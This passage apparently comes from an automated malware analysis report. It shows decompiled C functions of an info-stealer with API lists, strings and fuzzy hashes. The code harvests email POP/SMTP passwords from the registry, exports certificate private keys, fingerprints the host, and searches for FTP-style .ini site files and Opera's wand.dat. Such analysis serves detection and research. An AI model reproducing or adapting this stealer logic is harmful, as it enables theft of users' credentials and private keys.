				long _t93;
				long _t94;
				long _t97;

				_t93 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t94 = _t93;
				if(_t94 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t97 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t98 = _t97;
						if(_t97 != 0) {
							break;
						}
						_v2068 = E00401E4C( &_v2064, E00401DF8(_t98, _a8, "\\"),  &_v2064);
						_v2072 = E00401D71(_a4, _v2068, "EmailAddress", 0);
						_v2076 = E00401D71(_a4, _v2068, "Technology", 0);
						_v2080 = E00401D71(_a4, _v2068, "PopServer", 0);
						_v2084 = E00401D71(_a4, _v2068, "PopPort",  &_v2088);
						_v2092 = E00401D71(_a4, _v2068, "PopAccount", 0);
						_v2096 = E00401D71(_a4, _v2068, "PopPassword",  &_v2100);
						_v2104 = E00401D71(_a4, _v2068, "SmtpServer", 0);
						_v2108 = E00401D71(_a4, _v2068, "SmtpPort",  &_v2112);
						_v2116 = E00401D71(_a4, _v2068, "SmtpAccount", 0);
						_v2120 = E00401D71(_a4, _v2068, "SmtpPassword",  &_v2124);
						if(_v2072 != 0 && (_v2100 != 0 || _v2124 != 0)) {
							E004015CB(E004015CB(E004015CB(E00401569(_a12, 0xbeef0000), _a12, _v2072), _a12, _v2076), _a12, _v2080);
							E004015CB(E0040159F(_a12, _v2084, _v2088), _a12, _v2092);
							E004015CB(E0040159F(_a12, _v2096, _v2100), _a12, _v2104);
							E004015CB(E0040159F(_a12, _v2108, _v2112), _a12, _v2116);
							E0040159F(_a12, _v2120, _v2124);
						}
						E0040EBA3(_a4, _v2068, _a12);
						E004018B8(_v2068);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2080);
						E004018B8(_v2084);
						E004018B8(_v2092);
						E004018B8(_v2096);
						E004018B8(_v2104);
						E004018B8(_v2108);
						E004018B8(_v2116);
						E004018B8(_v2120);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t94;
			}

0x0040ebb6
0x0040ebbb
0x0040ebbd
0x0040ebc3
0x0040ebca
0x0040ebca
0x0040ebea
0x0040ebef
0x0040ebf1
0x00000000
0x00000000
0x0040ec14
0x0040ec2f
0x0040ec4a
0x0040ec65
0x0040ec85
0x0040eca0
0x0040ecc0
0x0040ecdb
0x0040ecfb
0x0040ed16
0x0040ed36
0x0040ed43
0x0040ed91
0x0040edb3
0x0040edd5
0x0040edf7
0x0040ee0b
0x0040ee0b
0x0040ee1c
0x0040ee27
0x0040ee32
0x0040ee3d
0x0040ee48
0x0040ee53
0x0040ee5e
0x0040ee69
0x0040ee74
0x0040ee7f
0x0040ee8a
0x0040ee95
0x0040ee9a
0x0040ee9a
0x00000000
0x0040eea5
0x0040eeab

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EBB6
RegEnumKeyExA.ADVAPI32 ref: 0040EBEA
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EEA5

Strings

SmtpServer, xrefs: 0040ECC8
PopPort, xrefs: 0040EC72
SmtpPort, xrefs: 0040ECE8
PopServer, xrefs: 0040EC52
SmtpPassword, xrefs: 0040ED23
PopAccount, xrefs: 0040EC8D
EmailAddress, xrefs: 0040EC1C
PopPassword, xrefs: 0040ECAD
Technology, xrefs: 0040EC37
SmtpAccount, xrefs: 0040ED03

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 1332880857-2111798378
Opcode ID: 6f9c3b9adf4acc33ae500b23a0682b87018db5573f7081e0b67ab4accee4c872
Instruction ID: e2a117a2fde9dc82a56ede7dd39e4504eb823868495590e5bf7fc199db2764f0
Opcode Fuzzy Hash: 6f9c3b9adf4acc33ae500b23a0682b87018db5573f7081e0b67ab4accee4c872
Instruction Fuzzy Hash: E871A23194011CAADF226F51CC02FEDBAB6FF04704F1485BAB558740B1DB7A5BA1AF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3BE, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142
encryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040D3BE(void* __ebx, char __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				long* _v24;
				char _v28;
				long* _v32;
				char _v36;
				intOrPtr _v40;
				void* __edi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t62;
				intOrPtr _t67;
				void* _t74;
				intOrPtr _t76;
				intOrPtr* _t77;
				intOrPtr _t79;

				_t75 = __ecx;
				_t74 = __ebx;
				_v8 = E004015F0(_a4, 0x48, 0);
				if( *0x414b47 != 0 &&  *0x414b4b != 0 &&  *0x414b53 != 0 &&  *0x414b13 != 0 &&  *0x414b17 != 0 &&  *0x414b1b != 0 &&  *0x414b1f != 0 &&  *0x414b4f != 0) {
					_t48 =  *0x414b47(0, 0x416871); // executed
					_v12 = _t48;
					if(_v12 != 0) {
						_t79 = 0;
						while(1) {
							_t49 =  *0x414b4b(_v12, _t79);
							_t79 = _t49;
							_t91 = _t79;
							if(_t79 == 0) {
								break;
							}
							_t76 =  *((intOrPtr*)(_t79 + 0xc));
							_t75 =  *((intOrPtr*)(_t76 + 0x68));
							_v16 =  *((intOrPtr*)(_t76 + 0x68));
							_t77 =  *((intOrPtr*)(_t76 + 0x6c));
							__eflags = _t77;
							if(__eflags != 0) {
								while(1) {
									__eflags = _v16;
									if(__eflags == 0) {
										goto L28;
									}
									_push("2.5.29.37");
									_push( *_t77);
									L004106EE();
									_t49 = _t49;
									__eflags = _t49;
									if(_t49 == 0) {
										__eflags =  *((intOrPtr*)(_t77 + 8));
										if( *((intOrPtr*)(_t77 + 8)) != 0) {
											_v20 = E004018CF( *((intOrPtr*)(_t77 + 8)));
											_t51 = E00401906( *((intOrPtr*)(_t77 + 0xc)), _v20,  *((intOrPtr*)(_t77 + 8)));
											_push(0x41687e);
											_push(_v20);
											L004106EE();
											__eflags = _t51;
											if(_t51 == 0) {
												_t55 =  *0x414b53(_t79, 0, 0,  &_v24,  &_v28, 0);
												__eflags = _t55;
												if(_t55 != 0) {
													_t58 =  *0x414b13(_v24, _v28,  &_v32);
													__eflags = _t58;
													if(_t58 != 0) {
														_t62 =  *0x414b17(_v32, 0, 7, 0, 0,  &_v36);
														__eflags = _t62;
														if(_t62 != 0) {
															_v40 = E004018CF(_v36);
															_t67 =  *0x414b17(_v32, 0, 7, 0, _v40,  &_v36);
															__eflags = _t67;
															if(_t67 != 0) {
																E00401569(_a4, 0xbeef0000);
																E0040159F(_a4,  *((intOrPtr*)(_t79 + 4)),  *((intOrPtr*)(_t79 + 8)));
																E0040159F(_a4, _v40, _v36);
															}
															E004018B8(_v40);
														}
														CryptDestroyKey(_v32);
													}
													CryptReleaseContext(_v24, 0);
												}
											}
											_t49 = E004018B8(_v20);
										}
									}
									_t77 = _t77 + 0x10;
									_t40 =  &_v16;
									 *_t40 = _v16 - 1;
									__eflags =  *_t40;
								}
							}
							L28:
						}
						 *0x414b4f(_v12, 0);
					}
				}
				return E00401636(_t74, _t75, _t77, _t91, _a4, _v8);
			}

0x0040d3be
0x0040d3be
0x0040d3d2
0x0040d3dc
0x0040d444
0x0040d44a
0x0040d451
0x0040d457
0x0040d459
0x0040d45d
0x0040d465
0x0040d465
0x0040d467
0x00000000
0x00000000
0x0040d46e
0x0040d471
0x0040d477
0x0040d47a
0x0040d47a
0x0040d47c
0x0040d595
0x0040d595
0x0040d599
0x00000000
0x00000000
0x0040d487
0x0040d48c
0x0040d48e
0x0040d493
0x0040d493
0x0040d495
0x0040d49b
0x0040d49f
0x0040d4ad
0x0040d4b9
0x0040d4be
0x0040d4c3
0x0040d4c6
0x0040d4cb
0x0040d4cd
0x0040d4e2
0x0040d4e8
0x0040d4ea
0x0040d4fa
0x0040d500
0x0040d502
0x0040d513
0x0040d519
0x0040d51b
0x0040d525
0x0040d538
0x0040d53e
0x0040d540
0x0040d54a
0x0040d558
0x0040d566
0x0040d566
0x0040d56e
0x0040d56e
0x0040d576
0x0040d576
0x0040d581
0x0040d581
0x0040d4ea
0x0040d58a
0x0040d58a
0x0040d49f
0x0040d58f
0x0040d592
0x0040d592
0x0040d592
0x0040d592
0x0040d595
0x0040d59f
0x0040d59f
0x0040d5a9
0x0040d5a9
0x0040d451
0x0040d5bd

APIs

CertOpenSystemStoreA.CRYPT32(00000000,00416871), ref: 0040D444
CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D45D
lstrcmp.KERNEL32 ref: 0040D48E

Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

lstrcmp.KERNEL32 ref: 0040D4C6
CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D4E2
CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D4FA
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D513
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D538
CryptDestroyKey.ADVAPI32(?), ref: 0040D576
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D581
CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D5A9

Strings

2.5.29.37, xrefs: 0040D487

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
String ID: 2.5.29.37
API String ID: 2649496969-3842544949
Opcode ID: 3efb584be195bc962edaf2b40421064beb62f15f05e1954507cd169d8d8bc6fd
Instruction ID: 69ea86f0ab44da64ba056d6111593992adadb32ff072f1572f9399bad78f7f88
Opcode Fuzzy Hash: 3efb584be195bc962edaf2b40421064beb62f15f05e1954507cd169d8d8bc6fd
Instruction Fuzzy Hash: 9A512931900205FBDF21AB94DC09BEEBB71BF44745F148436BA01761F0D779AA94DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404E73, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107
filestringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404E73(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
				struct _WIN32_FIND_DATAA _v322;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t34;
				void* _t36;
				CHAR* _t38;
				void* _t42;
				char* _t45;
				signed int* _t49;
				char** _t51;
				char* _t59;
				char* _t60;
				void* _t64;
				signed int* _t65;
				void* _t66;

				_t64 = __ecx;
				_v332 = 0;
				_t34 = _a8;
				if(_t34 == 0 ||  *_t34 == 0) {
					L22:
					return E004018B8(_v332);
				} else {
					_t36 = E004025A9(_a8);
					_t37 = _t36;
					if(_t36 != 0) {
						_t38 = E00401DF8(_t37, _a8, "*.*");
					} else {
						_t38 = E00401DF8(_t37, _a8, "\*.*");
					}
					_v332 = _t38;
					E004018E6( &_v322, 0x13e);
					_t42 = FindFirstFileA(_v332,  &_v322); // executed
					_v328 = _t42;
					if(_t42 + 1 != 0) {
						do {
							_t65 =  &_v322;
							if(( *_t65 & 0x00000010) == 0) {
								_v336 =  &(_t65[0xb]);
								_t45 = StrStrIA(_v336, ".ini");
								_t46 = _t45;
								if(_t45 != 0) {
									_t59 = E00401E4C(E00401DF8(_t46, _a8, "\\"), _t58, _v336);
									_push(_t59);
									_push(_t59);
									if(_a12 == 0) {
										_t60 = 1;
									} else {
										_t60 = StrStrIA(_t59, "Sites\\");
									}
									_pop(_t66);
									if(_t60 != 0) {
										E00404E5C(_a4, _t66);
									}
									E004018B8();
								}
							} else {
								_t49 =  &(_t65[0xb]);
								_push(_t49);
								_push(0x414f84);
								L00410712();
								if(_t49 != 0) {
									_t51 =  &( &_v322->cFileName);
									_push(_t51);
									_push(0x414f86);
									L00410712();
									_t52 = _t51;
									if(_t51 != 0) {
										E00404E73(_t64, _a4, E00401E4C(E00401DF8(_t52, _a8, "\\"), _t53,  &( &_v322->cFileName)), _a12);
										E004018B8(_t54);
									}
								}
							}
						} while (FindNextFileA(_v328,  &_v322) != 0);
						FindClose(_v328);
					}
					goto L22;
				}
			}

0x00404e73
0x00404e7c
0x00404e89
0x00404e8b
0x00404ff0
0x00404ffc
0x00404e97
0x00404e9a
0x00404e9f
0x00404ea1
0x00404eba
0x00404ea3
0x00404eab
0x00404eab
0x00404ebf
0x00404ed1
0x00404ee3
0x00404ee8
0x00404eef
0x00404ef5
0x00404ef5
0x00404f01
0x00404f6b
0x00404f7c
0x00404f81
0x00404f83
0x00404f99
0x00404f9e
0x00404f9f
0x00404fa4
0x00404fb3
0x00404fa6
0x00404fac
0x00404fac
0x00404fb8
0x00404fbb
0x00404fc1
0x00404fc1
0x00404fc6
0x00404fc6
0x00404f03
0x00404f03
0x00404f06
0x00404f07
0x00404f0c
0x00404f13
0x00404f20
0x00404f23
0x00404f24
0x00404f29
0x00404f2e
0x00404f30
0x00404f5c
0x00404f61
0x00404f61
0x00404f30
0x00404f13
0x00404fdd
0x00404feb
0x00404feb
0x00000000
0x00404eef

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00404EE3
lstrcmpi.KERNEL32(00414F84,?), ref: 00404F0C
lstrcmpi.KERNEL32(00414F86,?), ref: 00404F29
FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 00404FD8
FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00404FEB

Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40

Strings

*.*, xrefs: 00404EB2
\*.*, xrefs: 00404EA3
Sites\, xrefs: 00404FA6
.ini, xrefs: 00404F71

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$.ini$Sites\$\*.*
API String ID: 3040542784-999409347
Opcode ID: c755dd4696622531b8e01361c334175e5357ee14416736f3a60b3252f0e749c2
Instruction ID: 4ebe6fddfcda91dad50fc3424f79042eee35b7dd55d742c6c8e7d1074e8a7db5
Opcode Fuzzy Hash: c755dd4696622531b8e01361c334175e5357ee14416736f3a60b3252f0e749c2
Instruction Fuzzy Hash: 763166B090020AAADF11BF61CC42FEE77A9AF80304F1045B7B518B51E1D77C9EC19E59

Uniqueness

Uniqueness Score: -1.00%

Function 004045FD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004045FD(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				struct _OSVERSIONINFOA _v164;
				char* _v168;
				char _v172;
				intOrPtr _v176;
				struct _SYSTEM_INFO _v212;
				struct HINSTANCE__* _v216;
				void* __ebx;
				void* __edi;
				int _t51;
				intOrPtr _t65;
				intOrPtr* _t75;
				void* _t82;
				char _t85;
				char _t86;
				char* _t88;

				_v8 = E004015F0(_a4, 0, 0);
				E00401569(_a4, 0xbeef0001);
				E004018E6( &_v164, 0x9c);
				_v164.dwOSVersionInfoSize = 0x9c;
				_t51 = GetVersionExA( &_v164);
				_t85 = 0;
				_t86 = 0;
				_t88 =  &(_v164.szCSDVersion);
				while(_t85 < 0x80) {
					__eflags =  *_t88;
					if( *_t88 == 0) {
						_t86 = 1;
					}
					_t86 = _t86;
					__eflags = _t86;
					if(_t86 != 0) {
						 *_t88 = 0;
					}
					_t88 = _t88 + 1;
					_t85 = _t85 + 1;
					__eflags = _t85;
				}
				if(_t51 == 0) {
					E0040159F(_a4, 0, 0);
				} else {
					E0040159F(_a4,  &_v164, 0x9c);
				}
				E00401569(_a4, E0040446A());
				_v168 = E004018CF(0x400);
				E0040159F(_a4, _v168, GetLocaleInfoA(0x400, 0x1002, _v168, 0x3ff));
				E0040159F(_a4, _v168, GetLocaleInfoA(0x400, 0x1001, _v168, 0x3ff));
				E00401569(_a4, E004044D2()); // executed
				E0040456C(_t85, _t86, _t88); // executed
				_t65 = E004027F7(_t85, _t86, _t88, "HWID",  &_v172); // executed
				_v176 = _t65;
				if(_v176 == 0 || _v172 < 0x14) {
					E0040159F(_a4, 0, 0);
				} else {
					_v172 = _v172 + 4;
					E00401569(_a4, _v172);
					_v172 = _v172 - 4;
					E00401569(_a4, 0xffffffff);
					E0040157E(_a4, _v176, _v172);
				}
				E004018B8(_v176);
				E004018B8(_v168);
				_t82 = 0;
				_v216 = GetModuleHandleA("kernel32.dll");
				if(_v216 != 0) {
					_t75 = GetProcAddress(_v216, "GetNativeSystemInfo");
					if(_t75 != 0) {
						 *_t75( &_v212); // executed
						_t82 = 1;
					}
				}
				_t83 = _t82;
				_t97 = _t82;
				if(_t82 == 0) {
					GetSystemInfo( &_v212);
				}
				E0040159F(_a4,  &_v212, 0x24);
				return E00401636(_t83, _t85, _t88, _t97, _a4, _v8);
			}

0x00404614
0x0040461f
0x00404630
0x00404635
0x00404646
0x0040464b
0x0040464d
0x0040464f
0x0040466a
0x00404657
0x0040465a
0x0040465c
0x0040465c
0x00404661
0x00404661
0x00404663
0x00404665
0x00404665
0x00404668
0x00404669
0x00404669
0x00404669
0x00404674
0x00404693
0x00404676
0x00404685
0x00404685
0x004046a1
0x004046b0
0x004046da
0x00404703
0x00404711
0x00404716
0x00404727
0x0040472c
0x00404739
0x00404787
0x00404744
0x00404744
0x00404754
0x00404759
0x00404765
0x00404779
0x00404779
0x00404792
0x0040479d
0x004047a2
0x004047ae
0x004047bb
0x004047cd
0x004047cf
0x004047d8
0x004047da
0x004047da
0x004047cf
0x004047db
0x004047db
0x004047dd
0x004047e6
0x004047e6
0x004047f7
0x0040480a

APIs

GetVersionExA.KERNEL32(0000009C), ref: 00404646
GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 004046CB
GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004046F4
GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047A9
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004047C8
GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047D8
GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047E6

Strings

GetNativeSystemInfo, xrefs: 004047BD
HWID, xrefs: 00404722
kernel32.dll, xrefs: 004047A4

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
String ID: GetNativeSystemInfo$HWID$kernel32.dll
API String ID: 1787888500-92997708
Opcode ID: e9768509069aead0b0cb670f5b22b7b50caa52f107e222a803b94d01e9eff756
Instruction ID: db48739d82feba77cf0cee32c0e06214f71ac3aef5999eac4331223504f8986d
Opcode Fuzzy Hash: e9768509069aead0b0cb670f5b22b7b50caa52f107e222a803b94d01e9eff756
Instruction Fuzzy Hash: 55518471A00218BEEF217B61CC42F9D7A35AF81308F0040BBB649790E1D7B95ED59F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00408AE5, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77
filestringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00408AE5(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, char* _a8) {
				struct _WIN32_FIND_DATAA _v322;
				void* _v328;
				CHAR* _v332;
				char** _v336;
				char* _v340;
				char* _t30;
				void* _t36;
				int _t39;
				char** _t40;
				char** _t42;
				char* _t46;
				void* _t52;
				void* _t53;
				void* _t58;

				_t58 = __edi;
				_t53 = __ecx;
				_t52 = __ebx;
				_v332 = 0;
				_t30 = _a8;
				if(_t30 == 0 ||  *_t30 == 0) {
					L14:
					return E004018B8(_v332);
				} else {
					_v332 = E00401DF8(_t30, _a8, "\*.*");
					E004018E6( &_v322, 0x13e);
					_t36 = FindFirstFileA(_v332,  &_v322); // executed
					_v328 = _t36;
					if(_t36 + 1 == 0) {
						goto L14;
					} else {
						goto L4;
					}
					do {
						L4:
						if((_v322.dwFileAttributes & 0x00000010) != 0) {
							_t40 =  &( &_v322->cFileName);
							_push(_t40);
							_push(0x414f84);
							L00410712();
							if(_t40 != 0) {
								_t42 =  &( &_v322->cFileName);
								_push(_t42);
								_push(0x414f86);
								L00410712();
								if(_t42 != 0) {
									_v336 =  &( &_v322->cFileName);
									_t46 = E00401E4C(E00401DF8( &( &_v322->cFileName), _a8, "\\"), _t45, _v336);
									_v340 = _t46;
									_push(_t46);
									if(StrStrIA(_v340, "opera") != 0) {
										E00408961(_t52, _t53, _t58, _a4, _v340, "wand.dat");
									}
									E004018B8();
								}
							}
						}
						_t39 = FindNextFileA(_v328,  &_v322); // executed
					} while (_t39 != 0);
					FindClose(_v328); // executed
					goto L14;
				}
			}

0x00408ae5
0x00408ae5
0x00408ae5
0x00408aee
0x00408afb
0x00408afd
0x00408c12
0x00408c1e
0x00408b09
0x00408b16
0x00408b28
0x00408b3a
0x00408b3f
0x00408b46
0x00000000
0x00000000
0x00000000
0x00000000
0x00408b4c
0x00408b4c
0x00408b58
0x00408b64
0x00408b67
0x00408b68
0x00408b6d
0x00408b74
0x00408b7e
0x00408b81
0x00408b82
0x00408b87
0x00408b8e
0x00408b9b
0x00408bb5
0x00408bba
0x00408bc0
0x00408bd3
0x00408be3
0x00408be3
0x00408be8
0x00408be8
0x00408b8e
0x00408b74
0x00408bfa
0x00408bff
0x00408c0d
0x00000000
0x00408c0d

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00408B3A
lstrcmpi.KERNEL32(00414F84,?), ref: 00408B6D
lstrcmpi.KERNEL32(00414F86,?), ref: 00408B87
StrStrIA.SHLWAPI(?,opera,00000000,00414F86,?,00414F84,?,00000000,?), ref: 00408BCC
FindNextFileA.KERNEL32(?,?,00000000,?), ref: 00408BFA
FindClose.KERNEL32(?,?,?,00000000,?), ref: 00408C0D

Strings

opera, xrefs: 00408BC1
\*.*, xrefs: 00408B09
wand.dat, xrefs: 00408BD5

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*$opera$wand.dat
API String ID: 3663067366-3278183560
Opcode ID: b0fc928c9cf7a6a507de29c057552652b4013fe6d0d76c55fa8916865615959a
Instruction ID: e5ee878ad4cec5bad4980fd33fa9531b0e4dcb501f0c88bdaa15308997453479
Opcode Fuzzy Hash: b0fc928c9cf7a6a507de29c057552652b4013fe6d0d76c55fa8916865615959a
Instruction Fuzzy Hash: 88311E7090021D9ADB60AB51CD42AE977B5AB44304F0041BBB548B91E1DB78AEC19F58

Uniqueness

Uniqueness Score: -1.00%

Function 004041A6, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117
filestringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004041A6(void* __ecx, intOrPtr _a4, char* _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
				struct _WIN32_FIND_DATAA _v322;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t44;
				void* _t46;
				CHAR* _t48;
				void* _t52;
				char* _t55;
				int _t57;
				signed int* _t58;
				char** _t60;
				void* _t62;
				void* _t64;
				void* _t70;
				void* _t74;
				signed int* _t75;

				_t74 = __ecx;
				_v332 = 0;
				_t44 = _a8;
				if(_t44 == 0 ||  *_t44 == 0) {
					L25:
					return E004018B8(_v332);
				} else {
					_t46 = E004025A9(_a8);
					_t47 = _t46;
					if(_t46 != 0) {
						_t48 = E00401DF8(_t47, _a8, "*.*");
					} else {
						_t48 = E00401DF8(_t47, _a8, "\*.*");
					}
					_v332 = _t48;
					E004018E6( &_v322, 0x13e);
					_t52 = FindFirstFileA(_v332,  &_v322); // executed
					_v328 = _t52;
					if(_t52 + 1 != 0) {
						do {
							_t75 =  &_v322;
							if(( *_t75 & 0x00000010) == 0) {
								_t54 =  &(_t75[0xb]);
								_v336 =  &(_t75[0xb]);
								if(_a12 != 0) {
									_t55 = StrStrIA(_v336, _a12);
									_t54 = _t55;
									if(_t55 == 0) {
										goto L23;
									}
									L19:
									_t70 = E00401E4C(E00401DF8(_t54, _a8, "\\"), _t69, _v336);
									_push(_t70);
									if(_a20 == 0) {
										E0040406C(_a4, _t70, _a16);
									} else {
										_a20(_a4, _t70, _a16);
									}
									E004018B8();
									goto L23;
								}
								goto L19;
							}
							_t58 =  &(_t75[0xb]);
							_push(_t58);
							_push(0x414f84);
							L00410712();
							if(_t58 != 0) {
								_t60 =  &( &_v322->cFileName);
								_push(_t60);
								_push(0x414f86);
								L00410712();
								if(_t60 != 0) {
									_t62 = E004025A9(_a8);
									_t63 = _t62;
									if(_t62 != 0) {
										_t64 = E00401DF8(_t63, _a8, 0);
									} else {
										_t64 = E00401DF8(_t63, _a8, "\\");
									}
									E004041A6(_t74, _a4, E00401E4C(_t64, _t64,  &( &_v322->cFileName)), _a12, _a16, _a20); // executed
									E004018B8(_t65);
								}
							}
							L23:
							_t57 = FindNextFileA(_v328,  &_v322); // executed
						} while (_t57 != 0);
						FindClose(_v328); // executed
					}
					goto L25;
				}
			}

0x004041a6
0x004041af
0x004041bc
0x004041be
0x00404342
0x0040434e
0x004041ca
0x004041cd
0x004041d2
0x004041d4
0x004041ed
0x004041d6
0x004041de
0x004041de
0x004041f2
0x00404204
0x00404216
0x0040421b
0x00404222
0x00404228
0x00404228
0x00404234
0x004042bd
0x004042c0
0x004042ca
0x004042d7
0x004042dc
0x004042de
0x00000000
0x00000000
0x004042e0
0x004042f4
0x004042f9
0x004042fe
0x00404313
0x00404300
0x00404307
0x00404307
0x00404318
0x00000000
0x00404318
0x00000000
0x004042cc
0x0040423a
0x0040423d
0x0040423e
0x00404243
0x0040424a
0x00404257
0x0040425a
0x0040425b
0x00404260
0x00404267
0x00404271
0x00404276
0x00404278
0x0040428e
0x0040427a
0x00404282
0x00404282
0x004042b1
0x004042b6
0x004042b6
0x00404267
0x0040431d
0x0040432a
0x0040432f
0x0040433d
0x0040433d
0x00000000
0x00404222

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00404216
lstrcmpi.KERNEL32(00414F84,?), ref: 00404243
lstrcmpi.KERNEL32(00414F86,?), ref: 00404260
FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 0040432A
FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 0040433D

Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40

Strings

*.*, xrefs: 004041E5
\*.*, xrefs: 004041D6

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
